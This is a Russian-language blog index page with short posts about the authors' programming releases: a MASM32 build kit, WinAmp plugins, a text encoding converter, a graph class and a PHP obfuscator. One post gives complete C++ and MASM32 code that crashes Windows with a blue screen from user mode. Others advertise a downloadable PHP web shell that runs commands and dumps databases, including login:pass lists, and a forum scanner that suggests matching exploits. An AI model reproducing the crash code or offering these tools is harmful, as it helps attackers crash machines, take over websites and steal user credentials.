Misc

Иногда мы с Kaimi задумываемся - что же в очередной раз написать в наш блог. Порой этот вопрос нас так мучает, что новые посты не появляются в течение пары недель и даже больше :)

Поэтому мы решили спросить наших читателей - что бы ВЫ хотели видеть на нашем блоге?
- простые, небольшие и востребованные релизы для актуальных тем (соц-сети, e-mail'ы и др.);
- статьи о заработке по соцсетям, сео, небольшие заметки;
- большие скрипты, выполняющие сложные функции, или gui-программы;
- новое, интересное, актуальное в сети - заметки;
- статьи по программированию на разных языках для новичков на конкретных примерах;
- сложные статьи по программированию со сложными примерами.

Укажите, какие пункты вы бы хотели видеть, поясните, почему вы выбрали именно эти пункты (раскройте их смысл, как вы его себе представляете, что нужно именно ВАМ). Можно добавлять свои пункты.

Многие личности в комментариях на блоге спрашивают, как скомпилировать какой-нибудь исходник masm32. Чтобы решить этот вопрос, собрал небольшой комплект для быстрой компиляции, не требующий установки. Комплект содержит 64-байтный стаб, ассемблер последней версии, патченный линкер, не оставляющий в exe-файлах сигнатуры с информацией о компьютере. Бинарные файлы будут очень маленького размера.
Читать дальше »

Написал небольшую библиотеку на ассемблере (MASM32) для работы с http-протоколом.
Читать дальше »

Совсем недавно я освоил написание плагинов для этого проигрывателя. Следует отметить, что официального SDK от NullSoft нет, и эта компания изредка выдает общественности куски документации по своему плееру. Некоторые описанные возможности не работают или работают неправильно, некоторые совсем плохо прокомментированы, поэтому мне пришлось много экспериментировать, чтобы написать нечто рабочее. Кстати, пример написанного мной плагина вместе с полностью работоспособным сервисом ведения статистики прослушиваний и создания подписей-картинок для форумов можно посмотреть тут: MusicSign.
Существует достаточно всевозможных тонкостей написания плагинов для WinAmp'а, и я постараюсь их описать в этой статье. Примеры буду приводить на ассемблере MASM32 (собственно, сами плагины я на нем и пишу), но примеры будут несложные, поэтому знающим c/c++ и немного Win32 API будет легко их понять.
Читать дальше »

Очередной релиз от меня - программка для конвертации текста в разные представления и вычисления хэшей, написанная на ассемблере (masm32).
Имеется быстрое копирование и вставка текста, сохранение и открытие текстовых файлов.

Поддерживает конвертацию:
* Text -> URLEncode
* Text -> String.fromCharCode (ascii)
* Text -> String.fromCharCode (utf)
* Text -> base64
* Text -> MySQL char
* Text -> HEX
* Text -> BIN
* Text -> chr()
* Text -> MSSQL char
* Text -> PostgreSQL
* Text -> MD5
* Text -> SHA1
* Text -> &#xxx; (ascii)
* Text -> &#xxx; (utf)
* Text -> \xhh
* Text -> %XX
* Text -> VB chr$()
* Text -> C# (char)
* Text -> Транслит
* URLEncoded -> Text
* base64 -> Text

Скриншот:

Скачать exe (10кб) и исходные коды: ZIP

В общем исходный код программки ничем не отличается от тех, что я выкладывал раньше, но есть несколько интересных особенностей, которые я опишу дальше.
Читать дальше »

Наткнулся на забавный исходник на одном китайском сайте, где показано, как можно сделать BSOD (Blue Screen of Death, синий экран смерти) в Windows из User-Mode (ring 3) без всякого Native API:

Код на c++:

#include <windows .h>
#include <tlhelp32 .h>
 
#pragma comment(lib,"user32.lib")
 
int main()
{
   HANDLE SnapShotHandle = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD,0);
   THREADENTRY32 tBuffer={0};
   tBuffer.dwSize=sizeof(THREADENTRY32);
   if((SnapShotHandle!=INVALID_HANDLE_VALUE) && Thread32First(SnapShotHandle,&tBuffer))
   {
       while (Thread32Next(SnapShotHandle,&tBuffer))
       {
           AttachThreadInput(tBuffer.th32ThreadID,GetCurrentThreadId(),TRUE);
       }
   }
   return 1;
}
</tlhelp32></windows>

Код на ассемблере (переписал с си++ для уменьшения размера, весит всего 1кб):

      .486
      .model flat, stdcall
      option casemap :none
      include \masm32\include\windows.inc
      include \masm32\include\user32.inc
      include \masm32\include\kernel32.inc
      include \masm32\macros\macros.asm
 
      includelib \masm32\lib\user32.lib
      includelib \masm32\lib\kernel32.lib
 
 
.data?
SnapShotHandle HANDLE ?
tBuffer THREADENTRY32 <>
 
.code
start:
mov SnapShotHandle,FUNC(CreateToolhelp32Snapshot,TH32CS_SNAPTHREAD,0)
mov tBuffer.dwSize,sizeof THREADENTRY32
 
invoke Thread32First,SnapShotHandle,offset tBuffer
 
.if SnapShotHandle!=INVALID_HANDLE_VALUE && eax
 
 
  again:
  invoke Thread32Next,SnapShotHandle,offset tBuffer
  .if eax!=0
    invoke AttachThreadInput,tBuffer.th32ThreadID,FUNC(GetCurrentThreadId),TRUE
    jmp again
  .endif
 
.endif
 
end start

Код проверен и работает на WinXP SP3 и Windows Vista SP1. На Windows 7 не работает, пофикшено, на XP SP2 тоже вроде бы не работает.

UPD: обнаружился код на c++, который способен вызвать BSOD на Win XP SP2, Win 2003 SP1 и Win NT SP4 (Discovered on 23.12.2004 by YuraN).
Читать дальше »

Удобный веб-шелл, написанный на php+ajax. Отлично подойдет для удаленного администрирования системы.

Функционал:
[+] AJAX, UTF-8
[+] Все запросы методом POST
[+] Файловый менеджер: серфинг по папкам, просмотр дат изменения и прав для файлов и папок, удаление, перемещение, копирование, переименовывание, chmod, touch
[+] Скачивание файлов (есть поддержка скачивания больших файлов)
[+] Редактирование и сохранение файлов в utf-8 и windows-1251
[+] Подробная информация о системе
[+] Выполнение php-кода
[+] Выполнение команд cmd множеством способов (есть поддержка кириллицы)
[+] Защита паролем
[+] MySQL - выполнение команд, удобный менеджер команд
[+] MySQL дампинг - дамп таблиц или целых БД, поддержка больших объёмов данных, дамп результатов запросов MySQL
Если set_time_limit(0) будет недоступно, дамп всё равно возможен по частям.
Можно сдампить в виде файла, например, список login:pass или список e-mail'ов из какой-нибудь таблицы.
[+] Дамп MySQL-таблиц производится без создания каких-либо файлов на сервере - всё напрямую направляется в браузер.
[+] Быстрое удаление скрипта
[+] Удобство в том, что можно работать с файлами, php, cmd и другими функциями независимо друг от друга, то есть примерно так - полистать файлы, выполнить пхп-код, вернуться к файлам, в это время результат выполнения php-кода не стирается, и к нему можно всегда вернуться.

Если будете что-либо менять в шелле, сохраняйте его в кодировке UTF-8 без BOM (так умеет делать, например, Notepad++).

Скачать: RAR

Класс dxgraph предоставляет возможности построения столбчатых (вертикальных и горизонтальных) диаграмм, графиков всевозможных функций, круговых диаграмм, ступенчатых диаграмм, графиков по точкам, а также создания легенд диаграмм и графиков, сеток, координатных осей, градиентов и т.д. Этот класс используется, например, здесь: Статистика torrentoid.ru для рисования графика и диаграммы скачиваний. Текущая версия класса 1.2.

Подробную документацию с примером можно посмотреть здесь: Мануал

Скачать сам класс можно тут: скачать в zip

Forum Detector - это скрипт, написанный на php, который поможет вам определить, что за форум установлен на интересующем вас сайте. Если конкретнее, то скрипт умеет:
- определять тип форума (на данный момент поддерживается распознавание IPB, phpBB, vBulletin, MyBB)
- определять версию форума по разным критериям
- определять возможные уязвимости форума и предлагать подходящие для них эксплойты
- определять ТиЦ и PR сайта
- есть поддержка прокси, socks5, прокси с авторизацией, socks5 с авторизацией

Скачать скрипт в zip

UPD 16.04.09: исправлен косяк при работе с проксями.

(c) dx

Один из лучших обфускаторов PHP-кода, сам написан также на PHP.

Из возможностей:
- замена имет переменных с возможностью давать им короткие, случайные или однообразные имена;
- шифрование статических строк - простая обфускация или с использованием base64
- обфускация имен функций - аналогично именам переменных
- сжатие скрипта
- архивация скрипта
- возможность отключения замены конкретных имен функций, переменных, строк в параметрах функций
- возможность замены имен в eval()
- возможность добавления комментариев, которые сделают код максимально нечитаемым

Скачать:
Скачать в zip